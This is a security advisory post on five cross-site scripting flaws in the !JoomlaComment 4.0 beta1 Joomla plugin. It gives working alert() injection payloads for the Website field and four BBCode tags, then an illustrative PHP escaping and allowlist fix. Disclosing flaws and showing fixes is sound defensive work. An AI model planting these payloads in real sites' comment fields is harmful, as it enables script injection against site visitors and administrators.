jeffchannell.com

!JoomlaComment 4.0 beta1 Multiple XSS Vulnerabilities

Posted in Joomla!
2009-09-17 05:00:00 +0000 UTC

!JoomlaComment 4.0 beta1, a commenting plugin, suffers from multiple XSS vulnerabilities.

  1. Website Input XSS

    The 'Website' input field is checked for HTML markup, but the check fails to sanitize extra attributes (parameters) appended to the value:
    ' onmouseover='alert(String.fromCharCode(88,83,83))
    ' style='color:expression(alert(String.fromCharCode(88,83,83)))
  2. [img] BBCode Tag XSS

    [img]http://pick.a.big/image.png' onmousemove='javascript:alert(String.fromCharCode(88,83,83))[/img]
  3. [url] BBCode Tag XSS

    [url=http://pick.a.big/image.png' onmousemove='javascript:alert(String.fromCharCode(88,83,83))]XSS[/url]
  4. [size] BBCode Tag XSS

    [size=large;color:expression(alert(String.fromCharCode(88,83,83)))]XSS[/size]
    This XSS vulnerability executes in the administrator area as well.
  5. [color] BBCode Tag XSS

    [color=red;font-size:expression(alert(String.fromCharCode(88,83,83)))]XSS[/color]
    This XSS vulnerability executes in the administrator area as well.
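
The five inputs above share two causes: single quotes reach an HTML attribute unescaped, and BBCode arguments are copied straight into `style`. The PHP below is an added example of output handling that addresses both; it is not JoomlaComment code or the vendor's fix, and the function names, the size table and the `rel` attribute are assumptions.

```php
<?php
// Added example, not JoomlaComment code; every function name is hypothetical.

// Attribute-context escaping. ENT_QUOTES encodes the single quote as well.
function attr(string $v): string
{
    return htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Absolute http(s) URL with no whitespace, quotes, angle or square brackets.
function safe_url(string $url): ?string
{
    return preg_match('~^https?://[^\s"\'<>\[\]]+\z~i', $url) ? $url : null;
}

// [size]/[color] arguments go through an allowlist and are never copied into style="".
function safe_style(string $tag, string $arg): ?string
{
    $sizes = ['small' => '0.8em', 'medium' => '1em', 'large' => '1.4em'];
    if ($tag === 'size') {
        return isset($sizes[$arg]) ? 'font-size:' . $sizes[$arg] : null;
    }
    return preg_match('/^(?:[a-z]{3,20}|#[0-9a-f]{6})\z/i', $arg) ? 'color:' . strtolower($arg) : null;
}

function render_bbcode(string $text): string
{
    $out = preg_replace_callback_array([
        '~\[img\]([^\[\]]*)\[/img\]~i' => function ($m) {
            $url = safe_url(htmlspecialchars_decode($m[1], ENT_QUOTES));
            return $url === null ? $m[0] : '<img src="' . attr($url) . '" alt="">';
        },
        '~\[url=([^\]]*)\](.*?)\[/url\]~is' => function ($m) {
            $url = safe_url(htmlspecialchars_decode($m[1], ENT_QUOTES));
            return $url === null ? $m[0] : '<a href="' . attr($url) . '" rel="nofollow">' . $m[2] . '</a>';
        },
        '~\[(size|color)=([^\]]*)\](.*?)\[/\1\]~is' => function ($m) {
            $style = safe_style(strtolower($m[1]), htmlspecialchars_decode($m[2], ENT_QUOTES));
            return $style === null ? $m[0] : '<span style="' . $style . '">' . $m[3] . '</span>';
        },
    ], attr($text)); // the whole comment is escaped first; only validated tags are rebuilt
    return $out ?? attr($text); // on a PCRE error, fall back to plain escaped text
}

// "Website" field: validate the URL, then escape it into a double-quoted attribute.
function render_website(string $url): string
{
    $url = safe_url(trim($url));
    return $url === null ? '' : '<a href="' . attr($url) . '" rel="nofollow">' . attr($url) . '</a>';
}
```

A tag whose argument fails validation stays in the output as escaped literal text, so rejected input remains visible to moderators, including in the administrator area.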

Timeline